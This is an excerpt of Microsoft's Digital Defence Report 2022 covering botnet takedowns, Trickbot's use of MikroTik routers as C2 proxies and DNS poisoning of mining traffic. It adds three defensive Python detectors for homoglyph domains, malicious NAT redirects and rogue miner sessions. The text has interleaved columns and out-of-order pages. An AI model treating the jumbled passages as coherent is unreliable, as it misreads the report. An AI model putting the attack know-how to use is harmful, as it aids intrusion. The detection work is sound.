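One way to turn the substitution table above into a detection check on inbound sender addresses, as an added example that is not part of the report: each domain is reduced to a skeleton in which the confusable characters from the table collapse to one form, so a sender with the same username as a trusted contact but a look-alike domain is flagged. The trusted and look-alike addresses are constructed.

```python
"""Flag sender addresses whose domain is a homoglyph of a trusted domain.

Added example, not code from the Microsoft report. skeleton() applies
the substitutions from the table above in reverse (rn/nn -> m, vv -> w,
0 -> o, q -> g, I/i/1 -> l, .cam -> .com, doubled l/i collapsed) so that
a genuine domain and its look-alikes share one canonical form. Swaps
that are not visually confusable (e for a, o for u) are caught by a
one-character substitution check. All addresses are constructed.
"""
import re

# Senders the organisation actually does business with (constructed).
TRUSTED_SENDERS = {"invoices@contoso.com", "billing@fabrikam.com"}


def skeleton(domain: str) -> str:
    """Canonical form shared by a domain and its homoglyph variants."""
    d = domain.lower().strip().rstrip(".")
    # Multi-character substitutions first: rn/nn stand in for m, vv for w.
    for fake, real in (("rn", "m"), ("nn", "m"), ("vv", "w")):
        d = d.replace(fake, real)
    # Single-character confusables: digits and l/I/i/| all fold to one letter.
    d = d.translate(str.maketrans({"0": "o", "q": "g", "1": "l", "i": "l", "|": "l"}))
    # .cam registered in place of .com.
    if d.endswith(".cam"):
        d = d[:-4] + ".com"
    # ll for l, ii for i and l for ll all collapse to a single l.
    return re.sub(r"l{2,}", "l", d)


def one_substitution_apart(a: str, b: str) -> bool:
    """True when a and b have equal length and differ in exactly one position."""
    return len(a) == len(b) and sum(x != y for x, y in zip(a, b)) == 1


def classify_sender(sender: str, trusted=TRUSTED_SENDERS) -> tuple:
    """Return (verdict, matched_trusted_address).

    verdict is 'trusted' for an exact match, 'homoglyph' when the username
    matches a trusted contact but the domain is only a look-alike, and
    'unknown' otherwise (no verdict is made about unrelated senders).
    """
    sender = sender.lower().strip()
    if sender in trusted:
        return ("trusted", sender)
    local, _, domain = sender.rpartition("@")
    for t in sorted(trusted):
        t_local, _, t_domain = t.rpartition("@")
        if local != t_local or domain == t_domain:
            continue
        sk, t_sk = skeleton(domain), skeleton(t_domain)
        if sk == t_sk or one_substitution_apart(sk, t_sk):
            return ("homoglyph", t)
    return ("unknown", None)
```

The verdict is meant as an input to mail-flow rules or triage, not as a hard block: a legitimate unrelated domain can share a skeleton with a trusted one, so flagged mail should be reviewed rather than silently dropped.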
24 Microsoft Digital Defence Report 2022
A timeline of botnet disruption from Microsoft’s early days of collaboration

For more than a decade, DCU has worked to proactively stop cybercrime, resulting in 26 malware and nation state disruptions. As the DCU team uses more advanced tactics and tools to shut down these illicit operations, we see the cybercriminals also evolve their approaches in an attempt to stay a step ahead. Here is a timeline showing a sample of the botnets disrupted by DCU and the strategies Microsoft adopted to shut them down.

Timeline years: 2008, 2009, 2011, 2013, 2019, 2022

Microsoft Digital Crimes Unit is formed
Collaboration: Designed to thwart cybercrime impacting the Microsoft ecosystem through close integration across a team of investigators, lawyers and engineers.
Microsoft approach: The goal is to better understand the technical aspects of various malware and provide these insights to Microsoft’s legal team to develop an effective disruption strategy.

Conficker botnet
Description: A fast-spreading worm targeting the Windows OS, infecting millions of computers and devices in a common network; created network outages worldwide.
Collaboration: Formation of the Conficker Working Group, the first consortium of its kind. Microsoft partnered with 16 organisations across the globe to defeat the bot.
Microsoft response: The group collaborated across many international jurisdictions and was successful in bringing Conficker down.

Waledac botnet
Description: A complex spam botnet with US domains that collected email addresses and distributed spam that infected up to 90,000 computers across the world.²⁶
Collaboration: Creation of another consortium, the Microsoft Malware Protection Centre (MMPC), with a focus on close collaboration with academics.²⁷
Microsoft response: Microsoft used a tiered disruption approach against the C2 and surprised bad actors by seizing US-based domains without notice.²⁸ Microsoft was granted temporary ownership of nearly 280 domains used by Waledac’s servers.

Rustock botnet
Description: A backdoor trojan spam email bot using internet providers as primary C2s; designed to sell pharmaceuticals.
Collaboration: Microsoft forged a partnership with Pfizer Pharmaceuticals to understand the drugs sold by Rustock and worked closely with Dutch law enforcement officials.²⁹
Microsoft response: Microsoft worked with US Marshals and law enforcement in the Netherlands to take down the C2 servers in that country. Registered and blocked all future domains produced by the botnet’s domain generation algorithms (DGAs).

Sirefef/Zero Access botnet
Description: An advertising botnet designed to direct people to dangerous websites that would install malware or steal personal information; infected more than two million computers and cost advertisers more than USD 2.7 million per month; primarily in US and Western Europe.
Collaboration: Worked closely with the FBI and Europol’s Cybercrime Centre to bring down the peer-to-peer infrastructure.
Microsoft response: Joined the Zero Access network, replaced the criminal C2 servers and successfully seized download server domains.

Trickbot botnet
Description: A sophisticated botnet with fragmented infrastructure across the globe that targeted the financial services industry; compromised IoT devices.
Collaboration: Microsoft partnered with the Financial Services Information Sharing and Analysis Centre (FS-ISAC) to bring down Trickbot.³⁰
Microsoft response: DCU built a system to identify and track bot infrastructure and generated notifications for active internet providers, taking into account specific laws in various countries.

Continued focus on disruption
Description: Microsoft disrupted the infrastructure of seven threat actors over the past year, preventing them from distributing additional malware, controlling victims’ computers and targeting additional victims.
Collaboration: In partnership with internet service providers, governments, law enforcement and private industry, Microsoft shared information to remediate over 17 million malware victims worldwide.

Looking ahead
DCU continues to innovate and is looking to use its experience in botnet disruptions to conduct coordinated operations that go beyond malware. Our continued success requires creative engineering, sharing of information, innovative legal theories and public and private partnerships.
25 Microsoft Digital Defence Report 2022
Cybercriminal abuse of infrastructure

Internet gateways as criminal command and control infrastructure

IoT devices are becoming an increasingly popular target for cybercriminals using widespread botnets. When routers are unpatched and left exposed directly to the internet, threat actors can abuse them to gain access to networks, execute malicious attacks and even support their operations.

The Microsoft Defender for IoT team conducts research on equipment ranging from legacy industrial control system controllers to cutting-edge IoT sensors. The team investigates IoT- and OT-specific malware to contribute to the shared list of indicators of compromise.

Routers are particularly vulnerable attack vectors because they are ubiquitous across internet-connected homes and organisations. We have been tracking the activity of MikroTik routers, a popular router around the world residentially and commercially, identifying how they are utilised for command and control (C2), domain name system (DNS) attacks and crypto mining hijacking.

More specifically, we identified how Trickbot operators utilise compromised MikroTik routers and reconfigure them to act as part of their C2 infrastructure. The popularity of these devices compounds the severity of their abuse by Trickbot, and their unique hardware and software enable threat actors to evade traditional security measures, expand their infrastructure and compromise more devices and networks.

Exposed routers are at risk of having potential vulnerabilities exploited.

By tracking and analysing traffic containing secure shell (SSH) commands, we observed attackers using MikroTik routers to communicate with Trickbot infrastructure after obtaining legitimate credentials to devices. These credentials can be obtained through brute force attacks, exploiting known vulnerabilities with readily available patches and using default passwords. Once a device is accessed, the attacker issues a unique command that redirects traffic between two ports in the router, establishing the line of communication between Trickbot-affected devices and the C2.

We have aggregated our knowledge of the various methods of attacking MikroTik devices, beyond just Trickbot, as well as known common vulnerabilities and exposures (CVEs) into an open-source tool for MikroTik devices, which can extract the forensic artifacts related to attacks on these devices.³¹

Devices acting as reverse proxies for malware C2 are not unique to Trickbot and MikroTik routers. In collaboration with the Microsoft RiskIQ team, we traced back to the C2 involved and, through observing SSL certificates, identified Ubiquiti and LigoWave devices that are impacted as well.³² This is a strong indication that IoT devices are becoming active components of nation state coordinated attacks and a popular target for cybercriminals using widespread botnets.

Trickbot attack chain

[Diagram nodes: Attacker; Command and control; Compromised IoT device; Target network. Steps shown: sets up malicious domains; installs Trickbot on target network via a campaign; communicates with C2 via router, drops payloads, steals info; performs recon to obtain network information; scans for MikroTik devices that are exposed to the internet; steals device credentials and maintains persistence; executes traffic redirection command.] Trickbot attack chain showing the use of MikroTik IoT devices as proxy servers for C2.

93,868: Number of exposed MikroTik routers.

[Map: Distribution of exposed MikroTik routers around the world.]
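An added example, not the Microsoft open-source forensic tool the text refers to, of how a defender can triage a MikroTik router’s exported configuration for the kind of traffic-redirection rule described above: it reads the NAT section of a RouterOS ‘/export’ and flags rules that hand traffic to an address outside the owner’s internal ranges. The export excerpt, the internal ranges and the addresses are constructed.

```python
"""Triage a MikroTik RouterOS '/export' for C2-style traffic redirection.

Added example; this is not the Microsoft open-source forensic tool
mentioned above. It parses the '/ip firewall nat' section of a RouterOS
export (including the backslash line continuations the export uses) and
flags dst-nat or netmap rules whose target lies outside the networks the
owner treats as internal, which is what a router reconfigured to proxy
for a C2 would show. The export text and all addresses are constructed.
"""
import ipaddress
import shlex

# Assumption: the owner's internal ranges are RFC 1918 plus loopback.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed export excerpt: a normal masquerade rule, a benign port
# forward to an internal host, and a forward to an outside address.
SAMPLE_EXPORT = """\
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=dst-nat chain=dstnat dst-port=443 in-interface=ether1 protocol=tcp \\
    to-addresses=192.168.88.10 to-ports=443
add action=dst-nat chain=dstnat comment="backup" dst-port=3443 protocol=tcp \\
    to-addresses=203.0.113.45 to-ports=80
/ip dns
set servers=192.168.88.1
"""


def _logical_lines(export_text: str):
    """Yield export lines with RouterOS backslash continuations joined."""
    buf = ""
    for raw in export_text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        yield buf + line
        buf = ""
    if buf:
        yield buf


def parse_nat_rules(export_text: str) -> list:
    """Return each 'add' rule under '/ip firewall nat' as a dict of key=value."""
    rules, in_nat = [], False
    for line in _logical_lines(export_text):
        if line.startswith("/"):
            in_nat = (line == "/ip firewall nat")
            continue
        if in_nat and line.startswith("add "):
            rule = {}
            for token in shlex.split(line[4:]):
                key, sep, value = token.partition("=")
                if sep:
                    rule[key] = value
            rules.append(rule)
    return rules


def is_internal(address: str) -> bool:
    """True when the (first) address of a to-addresses value is in INTERNAL_NETS."""
    try:
        addr = ipaddress.ip_address(address.split("-")[0])
    except ValueError:
        # Missing or malformed target: treat as not internal so it is reviewed.
        return False
    return any(addr in net for net in INTERNAL_NETS)


def suspicious_redirects(export_text: str) -> list:
    """dst-nat/netmap rules that send traffic to an address outside INTERNAL_NETS."""
    return [rule for rule in parse_nat_rules(export_text)
            if rule.get("action") in ("dst-nat", "netmap")
            and not is_internal(rule.get("to-addresses", ""))]
```

Every flagged rule still needs a human decision: a legitimate forward to a cloud host will also match, so the output is a review list, not a verdict.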
26 Microsoft Digital Defence Report 2022
Virtual machines as criminal
infrastructure
The widespread move to the cloud
includes cybercriminals who leverage
private assets of unwitting victims
obtained through phishing or
distributing malware credential stealers.
Many cybercriminals are choosing to
set up their malicious infrastructures
on cloud-based virtual machines (VMs),
containers and microservices.
Once the cybercriminal has access, a sequence of
events can occur to set up infrastructure – such
as a series of virtual machines through scripting
and automated processes. These scripted,
automated processes are used to launch
malicious activity including large scale email
spam attacks, phishing attacks and web pages
hosting nefarious content. It can even include
setting up a scaled virtual environment carrying
out cryptocurrency mining, causing the end
victim a bill of hundreds of thousands of dollars
at the end of the month.
Cybercriminals understand their malicious activity
has a limited life span before it is detected and
shut down. As a result, they have scaled up and
now operate proactively with contingencies top
of mind. They have been observed preparing
compromised accounts ahead of time and
monitoring their environments. As soon as an
account (set up using hundreds of thousands of
virtual machines) is detected, they traverse to
In the past year, Microsoft observed a growing
number of attacks that abuse routers for
redirecting cryptocurrency mining efforts.
Cybercriminals compromise routers connected
to mining pools and redirect mining traffic
to their associated IP addresses with DNS
poisoning attacks, which alters the DNS settings
of targeted devices. Affected routers register
the wrong IP address to a given domain name,
sending their mining resources – or hashes – to
pools used by threat actors. These pools might
mine anonymous coins associated with criminal
activities or use legitimate hashes generated by
miners to acquire a percentage of the coin that
they mined, thus reaping the rewards.
With more than half of known
vulnerabilities found in 2021 lacking a
patch, updating and securing routers
on corporate and private networks
remains a significant challenge for
device owners and administrators.
Crypto criminals
abusing IoT devices
Gateway devices are an increasingly
valuable target for threat actors as the
number of known vulnerabilities has
grown consistently from year to year.
They are being used for crypto mining
and other types of malicious activity.
As cryptocurrency has become more popular,
many individuals and organisations have invested
computational power and network resources
from devices such as routers to mine coins on
the blockchain. However, mining cryptocurrency
is a time- and resource-intensive process
with a low probability of success. To increase
the likelihood of mining a coin, miners pool
together in distributed, cooperative networks,
receiving hashes relative to the percentage of
the coin they succeeded in mining with their
connected resources.
the next account – already prepared by scripts to
be immediately activated – and their malicious
activity continues with little to no interruption.
Like cloud infrastructure, on-premises
infrastructure can be used in attacks with
virtual local environments that are unknown to
the on-premises user. This requires the initial
access point to remain open and accessible.
On-premises private assets have also been
abused by cybercriminals to initiate an onward
chain of cloud infrastructure, set up to obfuscate
their origin to avoid suspicious infrastructure
creation detection.
DNS poisoning of gateway devices compromises legitimate mining activities and redirects resources
to criminal mining activities.
Actionable insights
1 Implement good cyber hygiene and
provide cybersecurity training for
employees with guidance for avoiding
being socially engineered.
2 Conduct regular automated user activity
anomaly checks through detections at
scale to help reduce these types of attacks.
3 Update and secure routers on corporate
and private networks.
[Figure: Compromising devices for illegal crypto mining. Legitimate miners (including ASICs and routers) submit work to a pool and are paid in cryptocurrency. A portion of the hashes from the original pool is stolen by threat actors, or resources are transferred to the criminal's pool through DNS poisoning, or routers carry malware that steals resources for mining.]
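The figure describes two ways a gateway ends up working for a criminal pool: its DNS answers for the pool hostname are poisoned so miners connect elsewhere, or the router itself runs miner malware. The script below is an added example (not Microsoft's code or part of the report) showing how an administrator could check for both from gateway logs. It assumes a DNS log of the form "timestamp client qname A answer" and a flow log carrying the first payload line of each session; the pool hostname, addresses and log lines are constructed for the demo. The trusted address set is meant to be obtained out of band, for example by resolving the pool hostname over DoH/DoT to a known resolver rather than through the gateway under test.

```python
"""Added example: detect DNS-poisoned pool redirection and rogue stratum
sessions from constructed gateway logs.

Check 1: an A-record answer for a known mining-pool hostname that a trusted
         resolver does not return (DNS poisoning of the gateway).
Check 2: a stratum (mining protocol) session to a destination outside the
         operator's pool allowlist (miner malware on the router, or traffic
         already redirected to a criminal pool).
"""
from __future__ import annotations

import json
from dataclasses import dataclass

# Pool hostname -> addresses learned out of band from a trusted resolver.
# Hostname and addresses are assumptions for this example.
TRUSTED_POOL_ADDRS = {
    "pool.example-mining.test": {"198.51.100.10", "198.51.100.11"},
}

# Constructed gateway DNS log: "<ts> <client> <qname> <type> <answer>"
DNS_LOG = """\
2022-03-01T10:00:01Z 10.0.0.21 pool.example-mining.test A 198.51.100.10
2022-03-01T10:00:05Z 10.0.0.22 pool.example-mining.test A 203.0.113.77
2022-03-01T10:00:07Z 10.0.0.21 time.example.test A 192.0.2.5
"""

# Constructed flow log: "<ts> <src> <dst>:<port> <first payload line>"
# The third line is the gateway itself (10.0.0.1) opening a mining session.
FLOW_LOG = """\
2022-03-01T10:00:02Z 10.0.0.21 198.51.100.10:3333 {"id":1,"method":"mining.subscribe","params":["rig/1.0"]}
2022-03-01T10:00:06Z 10.0.0.22 203.0.113.77:3333 {"id":1,"method":"mining.subscribe","params":["rig/1.0"]}
2022-03-01T10:00:09Z 10.0.0.1 203.0.113.88:14444 {"id":1,"method":"login","params":{"login":"WALLET","agent":"miner/1.0"}}
2022-03-01T10:00:11Z 10.0.0.21 192.0.2.5:443 GET / HTTP/1.1
"""


@dataclass(frozen=True)
class Finding:
    kind: str      # "dns_poisoning" or "rogue_stratum"
    client: str    # internal host that issued the query / opened the session
    detail: str    # what was observed


def parse_dns(log: str):
    """Yield (client, qname, answer) for A records in the DNS log."""
    for line in log.splitlines():
        _ts, client, qname, rtype, answer = line.split()
        if rtype == "A":
            yield client, qname.lower().rstrip("."), answer


def poisoned_answers(log: str, trusted=TRUSTED_POOL_ADDRS) -> list[Finding]:
    """Pool hostname resolved to an address the trusted resolver never returns."""
    findings = []
    for client, qname, answer in parse_dns(log):
        if qname in trusted and answer not in trusted[qname]:
            findings.append(Finding("dns_poisoning", client, f"{qname} -> {answer}"))
    return findings


# First-message methods of common stratum dialects (JSON-RPC over TCP).
STRATUM_METHODS = {"mining.subscribe", "mining.authorize", "mining.submit", "login"}


def is_stratum(payload: str) -> bool:
    """True if the payload is a JSON-RPC object naming a stratum mining method."""
    try:
        msg = json.loads(payload)
    except ValueError:
        return False
    return isinstance(msg, dict) and msg.get("method") in STRATUM_METHODS


def rogue_stratum(log: str, trusted=TRUSTED_POOL_ADDRS) -> list[Finding]:
    """Stratum sessions whose destination is not a trusted pool address."""
    allowed = set().union(*trusted.values())
    findings = []
    for line in log.splitlines():
        _ts, src, dst, payload = line.split(maxsplit=3)
        host, _, port = dst.rpartition(":")
        if is_stratum(payload) and host not in allowed:
            method = json.loads(payload)["method"]
            findings.append(Finding("rogue_stratum", src, f"{host}:{port} {method}"))
    return findings


if __name__ == "__main__":
    for f in poisoned_answers(DNS_LOG) + rogue_stratum(FLOW_LOG):
        print(f"{f.kind:14} {f.client:12} {f.detail}")
```

On the constructed data the first check flags the client whose pool lookup resolved to 203.0.113.77, and the second flags both that redirected miner and the gateway itself opening a session to a pool that is on no allowlist. Pools that answer from rotating or CDN-fronted address sets need the trusted set refreshed at the same time as the log is taken, otherwise the first check produces false positives; the second check does not depend on DNS at all and is the one that catches a router running its own miner.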

original.pdf

  • 1. Microsoft Digital Defence Report 2022 Illuminating the threat landscape and empowering a digital defence.
  • 2. Contents The data, insights and events in this report are from July 2021 through June 2022 (Microsoft fiscal year 2022), unless otherwise noted. For the best experience viewing and navigating this report, we recommend using Adobe Reader, available as a free download from the Adobe website. Report Introduction 02 The State of Cybercrime 06 An overview of The State of Cybercrime 07 Introduction 08 Ransomware and extortion: A nation-level threat 09 Ransomware insights from front-line responders 14 Cybercrime-as-a-Service 18 The evolving phishing threat landscape 21 A timeline of botnet disruption from Microsoft’s early days of collaboration 25 Cybercriminal abuse of infrastructure 26 Is hacktivism here to stay? 28 Nation State Threats 30 An overview of Nation State Threats 31 Introduction 32 Background on nation state data 33 Sample of nation state actors and their activities 34 The evolving threat landscape 35 The IT supply chain as a gateway to the digital ecosystem 37 Rapid vulnerability exploitation 39 Russian state actors’ wartime cyber tactics threaten Ukraine and beyond 41 China expanding global targeting for competitive advantage 44 Iran growing increasingly aggressive following power transition 46 North Korean cyber capabilities employed to achieve regime’s three main goals 49 Cyber mercenaries threaten the stability of cyberspace 52 Operationalising cybersecurity norms for peace and security in cyberspace 53 Devices and Infrastructure 56 An overview of Devices and Infrastructure 57 Introduction 58 Governments acting to improve critical infrastructure security and resilience 59 IoT and OT exposed: Trends and attacks 62 Supply chain and firmware hacking 65 Spotlight on firmware vulnerabilities 66 Reconnaissance-based OT attacks 68 Cyber Influence Operations 71 An overview of Cyber Influence Operations 72 Introduction 73 Trends in cyber influence operations 74 Influence operations during the COVID-19 pandemic and Russia’s invasion of Ukraine 76 Tracking 
the Russian Propaganda Index 78 Synthetic media 80 A holistic approach to protect against cyber influence operations 83 Cyber Resilience 86 An overview of Cyber Resilience 87 Introduction 88 Cyber resiliency: A crucial foundation of a connected society 89 The importance of modernising systems and architecture 90 Basic security posture is a determining factor in advanced solution effectiveness 92 Maintaining identity health is fundamental to organisational well-being 93 Operating system default security settings 96 Software supply chain centrality 97 Building resilience to emerging DDoS, web application and network attacks 98 Developing a balanced approach to data security and cyber resiliency 101 Resilience to cyber influence operations: The human dimension 102 Fortifying the human factor with skilling 103 Insights from our ransomware elimination program 104 Act now on quantum security implications 105 Integrating business, security and IT for greater resilience 106 The cyber resilience bell curve 108 Contributing Teams 110 01 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
  • 3. Introduction by Tom Burt, Corporate Vice President, Customer Security & Trust
“The trillions of signals we analyse from our worldwide ecosystem of products and services reveal the ferocity, scope and scale of digital threats across the globe”
On February 23, 2022, the cybersecurity world entered a new age, the age of the hybrid war. On that day, hours before missiles were launched and tanks rolled across borders, Russian actors launched a massive destructive cyberattack against Ukrainian government, technology and financial sector targets. You can read more about these attacks and the lessons to be learned from them in the Nation State Threats chapter of this third annual edition of the Microsoft Digital Defence Report (MDDR). Key among those lessons is that the cloud provides the best physical and logical security against cyberattacks and enables advances in threat intelligence and endpoint protection that have proven their value in Ukraine.
While any survey of the year’s developments in cybersecurity must begin there, this year’s report provides a deep dive into much more. In the report’s first chapter, we focus on activities of cybercriminals, followed by nation state threats in chapter two. Both groups have greatly increased the sophistication of their attacks, which has dramatically increased the impact of their actions. While Russia drove headlines, Iranian actors escalated their attacks following a transition of presidential power, launching destructive attacks targeting Israel and ransomware and hack-and-leak operations targeting critical infrastructure in the United States. China also increased its espionage efforts in Southeast Asia and elsewhere in the global south, seeking to counter US influence and steal critical data and information.
Foreign actors are also using highly effective techniques to enable propaganda influence operations in regions around the globe, as covered in the third chapter. For example, Russia has worked hard to convince its citizens, and the citizens of many other countries, that its invasion of Ukraine was justified – while also sowing propaganda discrediting COVID vaccines in the West and simultaneously promoting their effectiveness at home. In addition, actors are increasingly targeting Internet of Things (IoT) devices or Operational Technology (OT) control devices as entry points to networks and critical infrastructure, which is discussed in chapter four. Finally, in the last chapter, we provide the insights and lessons we have learned over the past year defending against attacks directed at Microsoft and our customers as we review the year’s developments in cyber resilience.
Each chapter provides the key lessons learned and insights based on Microsoft’s unique vantage point. The trillions of signals we analyse from our worldwide ecosystem of products and services reveal the ferocity, scope and scale of digital threats across the globe. Microsoft is taking action to defend our customers and the digital ecosystem against these threats, and you can read about our technology that identifies and blocks billions of phishing attempts, identity thefts and other threats to our customers.
A snapshot of our landscape…
Scope and scale of threat landscape: The volume of password attacks has risen to an estimated 921 attacks every second – a 74% increase in just one year.
Dismantling cybercrime: To date, Microsoft removed more than 10,000 domains used by cybercriminals and 600 used by nation state actors.
Addressing vulnerabilities: 93% of our ransomware incident response engagements revealed insufficient controls on privilege access and lateral movement.
02
  • 4. Introduction by Tom Burt (continued)
‘The advent of cyberweapon deployment in the hybrid war in Ukraine is the dawn of a new age of conflict.’
We also use legal and technical means to seize and shut down infrastructure used by cybercriminals and nation state actors, and notify customers when they are being threatened or attacked by a nation state actor. We work to develop increasingly effective features and services that use AI/ML technology to identify and block cyber threats, and that help security professionals defend against and identify cyber-intrusions more rapidly and effectively. Perhaps most importantly, throughout the MDDR we offer our best advice on the steps individuals, organisations and enterprises can take to defend against these increasing digital threats. Adopting good cyber hygiene practices is the best defence and can significantly reduce the risk of cyberattacks.
The state of cybercrime
Cybercriminals continue to act as sophisticated profit enterprises. Attackers are adapting and finding new ways to implement their techniques, increasing the complexity of how and where they host campaign operation infrastructure. At the same time, cybercriminals are becoming more frugal. To lower their overhead and boost the appearance of legitimacy, attackers are compromising business networks and devices to host phishing campaigns, malware or even use their computing power to mine cryptocurrency. Find out more on p6
Nation state threats
Nation state actors are launching increasingly sophisticated cyberattacks designed to evade detection and further their strategic priorities. The advent of cyberweapon deployment in the hybrid war in Ukraine is the dawn of a new age of conflict. Russia has also supported its war with information influence operations, using propaganda to impact opinions in Russia, Ukraine and globally. Outside Ukraine, nation state actors have increased activity and have begun using advancements in automation, cloud infrastructure and remote access technologies to attack a wider set of targets. Corporate IT supply chains that enable access to ultimate targets were frequently attacked. Cybersecurity hygiene became even more critical as actors rapidly exploited unpatched vulnerabilities, used both sophisticated and brute force techniques to steal credentials and obfuscated their operations by using open source or legitimate software. In addition, Iran joins Russia in the use of destructive cyberweapons, including ransomware, as a staple of their attacks. These developments require urgent adoption of a consistent, global framework that prioritises human rights and protects people from reckless state behaviour online. All nations must work together to implement norms and rules for responsible state conduct. Find out more on p30
Devices and infrastructure
The pandemic, coupled with rapid adoption of internet-facing devices of all kinds as a component of accelerating digital transformation, has greatly increased the attack surface of our digital world. As a result, cybercriminals and nation states are quickly taking advantage. While the security of IT hardware and software has strengthened in recent years, the security of IoT and OT devices has not kept pace. Threat actors are exploiting these devices to establish access on networks and enable lateral movement, to establish a foothold in a supply chain or to disrupt the target organisation’s OT operations. Find out more on p56
03
  • 5. Introduction by Tom Burt (continued)
Cyber influence operations
Nation states are increasingly using sophisticated influence operations to distribute propaganda and impact public opinion both domestically and internationally. These campaigns erode trust, increase polarisation and threaten democratic processes. Skilled Advanced Persistent Manipulator actors are using traditional media together with internet and social media to vastly increase the scope, scale and efficiency of their campaigns, and the outsized impact they are having in the global information ecosystem. In the past year, we have seen these operations used as part of Russia’s hybrid war in Ukraine, but have also seen Russia and other nations, including China and Iran, increasingly deploy propaganda operations powered by social media to extend their global influence on a range of issues. Find out more on p71
Cyber resilience
Security is a key enabler of technological success. Innovation and enhanced productivity can only be achieved by introducing security measures that make organisations as resilient as possible against modern attacks. The pandemic has challenged us at Microsoft to pivot our security practices and technologies to protect our employees wherever they work. This past year, threat actors continued to take advantage of vulnerabilities exposed during the pandemic and the shift to a hybrid work environment. Since then, our principal challenge has been managing the prevalence and complexity of various attack methods and increased nation state activity. In this chapter, we detail the challenges we have faced, and the defences we have mobilised in response with our more than 15,000 partners. Find out more on p86
Our unique vantage point (July 1, 2021 through June 30, 2022)
34.7 bn identity threats blocked
37 bn email threats blocked
2.5 bn endpoint signals analysed daily
43 tn signals synthesised daily, using sophisticated data analytics and AI algorithms to understand and protect against digital threats and criminal cyberactivity.
8,500+ engineers, researchers, data scientists, cybersecurity experts, threat hunters, geopolitical analysts, investigators and frontline responders across 77 countries.
15,000+ partners in our security ecosystem who increase cyber resilience for our customers.
04
  • 6. Introduction by Tom Burt (continued)
We believe Microsoft – independently and through close partnerships with others in private industry, government and civil society – has a responsibility to protect the digital systems that underpin the social fabric of our society and promote safe, secure computing environments for every person, wherever they are located. This responsibility is the reason we have published the MDDR each year since 2020.
Our objective with this report is twofold:
1. To illuminate the evolving digital threat landscape for our customers, partners and stakeholders spanning the broader ecosystem, shining a light on both new cyberattacks and evolving trends in historically persistent threats.
2. To empower our customers and partners to improve their cyber resiliency and respond to these threats.
The report is the culmination of Microsoft’s vast data and comprehensive research. It shares our unique insights on how the digital threat landscape is evolving and the crucial actions that can be taken today to improve the security of the ecosystem. We hope to instil a sense of urgency, so readers take immediate action based on the data and insights we present both here and in our many cybersecurity publications throughout the year.
As we consider the gravity of the threat to the digital landscape – and its translation into the physical world – it is important to remember that we are all empowered to take action to protect ourselves, our organisations and enterprises against digital threats.
Thank you for taking the time to review this year’s Microsoft Digital Defence Report. We hope you will find that it provides valuable insight and recommendations to help us collectively defend the digital ecosystem.
Tom Burt, Corporate Vice President, Customer Security & Trust
05
  • 7. The State of Cybercrime
As cyber defences improve and more organisations are taking a proactive approach to prevention, attackers are adapting their techniques.
An overview of The State of Cybercrime 07
Introduction 08
Ransomware and extortion: A nation-level threat 09
Ransomware insights from front-line responders 14
Cybercrime-as-a-Service 18
The evolving phishing threat landscape 21
A timeline of botnet disruption from Microsoft’s early days of collaboration 25
Cybercriminal abuse of infrastructure 26
Is hacktivism here to stay? 28
06
  • 8. An overview of The State of Cybercrime
As cyber defences improve and more organisations are taking a proactive approach to prevention, attackers are adapting their techniques.
Cybercriminals continue to act as sophisticated profit enterprises. Attackers are adapting and finding new ways to implement their techniques, increasing the complexity of how and where they host campaign operation infrastructure. At the same time, cybercriminals are becoming more frugal. To lower their overhead and boost the appearance of legitimacy, attackers are compromising business networks and devices to host phishing campaigns, malware or even use their computing power to mine cryptocurrency.
The threat of ransomware and extortion is becoming more audacious with attacks targeting governments, businesses and critical infrastructure. Human operated ransomware is most prevalent, as one-third of targets are successfully compromised by criminals using these attacks and 5% of those are ransomed. Find out more on p9
Attackers increasingly threaten to disclose sensitive data to encourage ransom payments. Find out more on p10
The most effective defence against ransomware includes multifactor authentication, frequent security patches and Zero Trust principles across network architecture. Find out more on p13
Cybercrime continues to rise as the industrialisation of the cybercrime economy lowers the skill barrier to entry by providing greater access to tools and infrastructure. Find out more on p18
Credential phishing schemes which indiscriminately target all inboxes are on the rise and business email compromise, including invoice fraud, poses a significant cybercrime risk for enterprises. Find out more on p21
To disrupt the malicious infrastructures of cybercriminals and nation state actors, Microsoft relies on innovative legal approaches and our public and private partnerships. Find out more on p25
Understanding the ransomware economy (Find out more on p9)
Operators: A RaaS program (or syndicate) is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. Many RaaS programs incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services. Named RaaS programs: Conti, HIVE, Black Matter, LockBit, REvil, BlackCat.
Affiliates: Affiliates are generally small groups of people “affiliated” with one or more RaaS programs. Their role is to deploy the RaaS program payloads. Affiliates move laterally in the network, persist on systems, and exfiltrate data. Each affiliate has unique characteristics, such as different ways of doing data exfiltration.
Access brokers: Access brokers sell network access to other cybercriminals, or gain access themselves via malware campaigns, brute force, or vulnerability exploitation. Access broker entities can range from large to small. Top tier access brokers specialize in high-value network access, while lower tier brokers on the dark web might have just 1–2 usable stolen credentials for sale. Organizations and individuals with weak cybersecurity hygiene practices are at greater risk of having their network credentials stolen.
Human operated ransomware targeting and rate of success model (see p15)
2,500 potential target organisations
60 encounter activity associated with known ransomware attackers
20 are successfully compromised
1 falls victim to a successful ransomware event
Factors: Low barrier to entry. Access brokers sell access to compromised networks to Ransomware-as-a-Service affiliates, who run the ransomware attack. RaaS affiliates prioritise targets by intended impact or perceived profit. Attackers take advantage of any security weakness they find in the network, so attacks vary. The ransomware payload is the culmination of a chain of malicious activity.
Chart: 2022 BEC Themes (January-June 202 – Gift card scam, Invoice fraud, Payroll redirection, Business information; values shown: 9.3%, 1.9%, 4.6%, 4.3%.
Chart: Ransomware; Pre-ransomware.
07
  • 9. Introduction
Cybercrime continues to rise, with increases in both random and targeted attacks.
